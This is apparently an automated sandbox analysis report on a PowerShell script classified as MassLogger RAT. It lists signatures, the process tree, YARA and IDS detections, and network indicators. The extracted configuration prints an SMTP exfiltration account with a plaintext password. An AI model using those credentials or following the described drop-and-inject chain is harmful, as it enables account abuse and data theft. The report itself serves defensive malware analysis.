Edit tour

Windows Analysis Report
jqxrkk.ps1

Overview

General Information

Sample name:	jqxrkk.ps1
Analysis ID:	1586898
MD5:	32da6ee3b90b2d2f694b8635dfa58459
SHA1:	9272ee959d8290d6f4095fd6525c7927b5c92de0
SHA256:	00a6cd51b0d8ca285eea43383a0736a9c4b95ed381fb5607291d08dc9870e30f
Tags:	ps1user-threatinte1
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: RegAsm connects to smtp port

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Allocates memory in foreign processes

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

PE file contains section with special chars

PE file has nameless sections

Powershell drops PE file

Suspicious execution chain found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 5088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\jqxrkk.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

x.exe (PID: 1428 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 9FB7455B1C6CB563FF7E58F422F3BC6E)

RegAsm.exe (PID: 1280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "mtb.food@phobinh.com.vn", "Password": "danh@PB289", "Server": "mail.phobinh.com.vn", "To": "office@handtool.com.vn", "Port": 587}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xefb7:$a1: get_encryptedPassword 0xf2df:$a2: get_encryptedUsername 0xed52:$a3: get_timePasswordChanged 0xee73:$a4: get_passwordField 0xefcd:$a5: set_encryptedPassword 0x10929:$a7: get_logins 0x105da:$a8: GetOutlookPasswords 0x103cc:$a9: StartKeylogger 0x10879:$a10: KeyLoggerEventArgs 0x10429:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x8200f:$a1: get_encryptedPassword 0x98e37:$a1: get_encryptedPassword 0xafc57:$a1: get_encryptedPassword 0xc6877:$a1: get_encryptedPassword 0x82337:$a2: get_encryptedUsername 0x9915f:$a2: get_encryptedUsername 0xaff7f:$a2: get_encryptedUsername 0xc6b9f:$a2: get_encryptedUsername 0x81daa:$a3: get_timePasswordChanged 0x98bd2:$a3: get_timePasswordChanged 0xaf9f2:$a3: get_timePasswordChanged 0xc6612:$a3: get_timePasswordChanged 0x81ecb:$a4: get_passwordField 0x98cf3:$a4: get_passwordField 0xafb13:$a4: get_passwordField 0xc6733:$a4: get_passwordField 0x82025:$a5: set_encryptedPassword 0x98e4d:$a5: set_encryptedPassword 0xafc6d:$a5: set_encryptedPassword 0xc688d:$a5: set_encryptedPassword 0x83981:$a7: get_logins
Process Memory Space: powershell.exe PID: 5088	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1f4ee6:$b1: ::WriteAllBytes( 0x1f4f02:$b2: ::FromBase64String( 0x189c8:$s1: -join 0x25c49:$s1: -join 0x2910b:$s1: -join 0x297a5:$s1: -join 0x2b2a1:$s1: -join 0x2d4f5:$s1: -join 0x2dd1c:$s1: -join 0x2e577:$s1: -join 0x2ecb2:$s1: -join 0x2ece4:$s1: -join 0x2ed2c:$s1: -join 0x2ed4b:$s1: -join 0x2f59c:$s1: -join 0x2f718:$s1: -join 0x2f790:$s1: -join 0x2f823:$s1: -join 0x2fa89:$s1: -join 0x31c42:$s1: -join 0x406a6:$s1: -join
Process Memory Space: x.exe PID: 1428	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: x.exe PID: 1428	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: x.exe PID: 1428	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: x.exe PID: 1428	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x470db:$a1: get_encryptedPassword 0x473dd:$a2: get_encryptedUsername 0x46e8a:$a3: get_timePasswordChanged 0x46fab:$a4: get_passwordField 0x470f1:$a5: set_encryptedPassword 0x489dd:$a7: get_logins 0x4868e:$a8: GetOutlookPasswords 0x48480:$a9: StartKeylogger 0x4892d:$a10: KeyLoggerEventArgs 0x484dd:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegAsm.exe PID: 1280	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 1280	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1280	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 1280	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4ac7a:$a1: get_encryptedPassword 0x4af93:$a2: get_encryptedUsername 0x4aa29:$a3: get_timePasswordChanged 0x4ab4a:$a4: get_passwordField 0x4ac90:$a5: set_encryptedPassword 0x4c593:$a7: get_logins 0x4c244:$a8: GetOutlookPasswords 0x4c036:$a9: StartKeylogger 0x4c4e3:$a10: KeyLoggerEventArgs 0x4c093:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.x.exe.42e4aa0.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
4.2.x.exe.42e4aa0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.x.exe.42e4aa0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.x.exe.42e4aa0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3b7:$a1: get_encryptedPassword 0xd6df:$a2: get_encryptedUsername 0xd152:$a3: get_timePasswordChanged 0xd273:$a4: get_passwordField 0xd3cd:$a5: set_encryptedPassword 0xed29:$a7: get_logins 0xe9da:$a8: GetOutlookPasswords 0xe7cc:$a9: StartKeylogger 0xec79:$a10: KeyLoggerEventArgs 0xe829:$a11: KeyLoggerEventArgsEventHandler
4.2.x.exe.42e4aa0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12365:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11863:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b71:$a4: \Orbitum\User Data\Default\Login Data 0x12969:$a5: \Kometa\User Data\Default\Login Data
4.2.x.exe.42b6e58.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
4.2.x.exe.42b6e58.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.x.exe.42b6e58.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.x.exe.42b6e58.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3b7:$a1: get_encryptedPassword 0xd6df:$a2: get_encryptedUsername 0xd152:$a3: get_timePasswordChanged 0xd273:$a4: get_passwordField 0xd3cd:$a5: set_encryptedPassword 0xed29:$a7: get_logins 0xe9da:$a8: GetOutlookPasswords 0xe7cc:$a9: StartKeylogger 0xec79:$a10: KeyLoggerEventArgs 0xe829:$a11: KeyLoggerEventArgsEventHandler
4.2.x.exe.42cdc80.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
4.2.x.exe.42cdc80.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.x.exe.42cdc80.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.x.exe.42b6e58.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12365:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11863:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b71:$a4: \Orbitum\User Data\Default\Login Data 0x12969:$a5: \Kometa\User Data\Default\Login Data
4.2.x.exe.42cdc80.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3b7:$a1: get_encryptedPassword 0xd6df:$a2: get_encryptedUsername 0xd152:$a3: get_timePasswordChanged 0xd273:$a4: get_passwordField 0xd3cd:$a5: set_encryptedPassword 0xed29:$a7: get_logins 0xe9da:$a8: GetOutlookPasswords 0xe7cc:$a9: StartKeylogger 0xec79:$a10: KeyLoggerEventArgs 0xe829:$a11: KeyLoggerEventArgsEventHandler
4.2.x.exe.42cdc80.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12365:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11863:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b71:$a4: \Orbitum\User Data\Default\Login Data 0x12969:$a5: \Kometa\User Data\Default\Login Data
5.2.RegAsm.exe.400000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.RegAsm.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x105cc:$a9: StartKeylogger 0x10a79:$a10: KeyLoggerEventArgs 0x10629:$a11: KeyLoggerEventArgsEventHandler
5.2.RegAsm.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data 0x13971:$a4: \Orbitum\User Data\Default\Login Data 0x14769:$a5: \Kometa\User Data\Default\Login Data
4.2.x.exe.42e4aa0.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
4.2.x.exe.42e4aa0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.x.exe.42e4aa0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.x.exe.42e4aa0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0x25dd7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0x260ff:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0x25b72:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0x25c93:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x25ded:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x27749:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x273fa:$a8: GetOutlookPasswords 0x105cc:$a9: StartKeylogger 0x271ec:$a9: StartKeylogger 0x10a79:$a10: KeyLoggerEventArgs 0x27699:$a10: KeyLoggerEventArgs 0x10629:$a11: KeyLoggerEventArgsEventHandler 0x27249:$a11: KeyLoggerEventArgsEventHandler
4.2.x.exe.42e4aa0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2ad85:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a283:$a3: \Google\Chrome\User Data\Default\Login Data 0x13971:$a4: \Orbitum\User Data\Default\Login Data 0x2a591:$a4: \Orbitum\User Data\Default\Login Data 0x14769:$a5: \Kometa\User Data\Default\Login Data 0x2b389:$a5: \Kometa\User Data\Default\Login Data
4.2.x.exe.42cdc80.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
4.2.x.exe.42cdc80.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.x.exe.42cdc80.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.x.exe.42cdc80.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0x25fd7:$a1: get_encryptedPassword 0x3cbf7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0x262ff:$a2: get_encryptedUsername 0x3cf1f:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0x25d72:$a3: get_timePasswordChanged 0x3c992:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0x25e93:$a4: get_passwordField 0x3cab3:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x25fed:$a5: set_encryptedPassword 0x3cc0d:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x27949:$a7: get_logins 0x3e569:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x275fa:$a8: GetOutlookPasswords 0x3e21a:$a8: GetOutlookPasswords
4.2.x.exe.42cdc80.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2af85:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x41ba5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a483:$a3: \Google\Chrome\User Data\Default\Login Data 0x410a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x13971:$a4: \Orbitum\User Data\Default\Login Data 0x2a791:$a4: \Orbitum\User Data\Default\Login Data 0x413b1:$a4: \Orbitum\User Data\Default\Login Data 0x14769:$a5: \Kometa\User Data\Default\Login Data 0x2b589:$a5: \Kometa\User Data\Default\Login Data 0x421a9:$a5: \Kometa\User Data\Default\Login Data
4.2.x.exe.42b6e58.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
4.2.x.exe.42b6e58.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.x.exe.42b6e58.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.x.exe.42b6e58.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0x25fdf:$a1: get_encryptedPassword 0x3cdff:$a1: get_encryptedPassword 0x53a1f:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0x26307:$a2: get_encryptedUsername 0x3d127:$a2: get_encryptedUsername 0x53d47:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0x25d7a:$a3: get_timePasswordChanged 0x3cb9a:$a3: get_timePasswordChanged 0x537ba:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0x25e9b:$a4: get_passwordField 0x3ccbb:$a4: get_passwordField 0x538db:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x25ff5:$a5: set_encryptedPassword 0x3ce15:$a5: set_encryptedPassword 0x53a35:$a5: set_encryptedPassword 0x10b29:$a7: get_logins
4.2.x.exe.42b6e58.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2af8d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x41dad:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x589cd:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a48b:$a3: \Google\Chrome\User Data\Default\Login Data 0x412ab:$a3: \Google\Chrome\User Data\Default\Login Data 0x57ecb:$a3: \Google\Chrome\User Data\Default\Login Data 0x13971:$a4: \Orbitum\User Data\Default\Login Data 0x2a799:$a4: \Orbitum\User Data\Default\Login Data 0x415b9:$a4: \Orbitum\User Data\Default\Login Data 0x581d9:$a4: \Orbitum\User Data\Default\Login Data 0x14769:$a5: \Kometa\User Data\Default\Login Data 0x2b591:$a5: \Kometa\User Data\Default\Login Data 0x423b1:$a5: \Kometa\User Data\Default\Login Data 0x58fd1:$a5: \Kometa\User Data\Default\Login Data
Click to see the 30 entries

Sigma Signatures

Networking

Sigma detected: RegAsm connects to smtp port

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 123.30.244.30, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 1280, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49762

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\jqxrkk.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\jqxrkk.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\jqxrkk.ps1", ProcessId: 5088, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\jqxrkk.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\jqxrkk.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\jqxrkk.ps1", ProcessId: 5088, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T18:33:19.476114+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49712	132.226.8.169	80	TCP
2025-01-09T18:33:26.038692+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49712	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Found malware configuration

Source: 5.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "mtb.food@phobinh.com.vn", "Password": "danh@PB289", "Server": "mail.phobinh.com.vn", "To": "office@handtool.com.vn", "Port": 587}

Multi AV Scanner detection for submitted file

Source: jqxrkk.ps1

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49723 version: TLS 1.0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 00F05782h	5_2_00F05358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 00F051B9h	5_2_00F04F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 00F05782h	5_2_00F05367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 00F05782h	5_2_00F056AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB1935h	5_2_05EB15F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBD088h	5_2_05EBCDE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBF028h	5_2_05EBED80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB0FF1h	5_2_05EB0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBC7D8h	5_2_05EBC530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBE778h	5_2_05EBE4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBBF28h	5_2_05EBBC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB0741h	5_2_05EB0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB3EF8h	5_2_05EB3C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBDEC8h	5_2_05EBDC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB3AA0h	5_2_05EB37F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBB220h	5_2_05EBAF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB31F0h	5_2_05EB2F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBA970h	5_2_05EBA6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBD93Ah	5_2_05EBD690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBF8D8h	5_2_05EBF630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBA0C0h	5_2_05EB9E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBF480h	5_2_05EBF1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB1449h	5_2_05EB11A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBCC30h	5_2_05EBC988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBEBD0h	5_2_05EBE928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB0B99h	5_2_05EB08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBC380h	5_2_05EBC0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB4350h	5_2_05EB40A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBE320h	5_2_05EBE078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB02E9h	5_2_05EB0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBBAD0h	5_2_05EBB828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBB678h	5_2_05EBB3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB3648h	5_2_05EB33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBADC8h	5_2_05EBAB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EB2D98h	5_2_05EB2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBFD30h	5_2_05EBFA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 05EBA518h	5_2_05EBA270
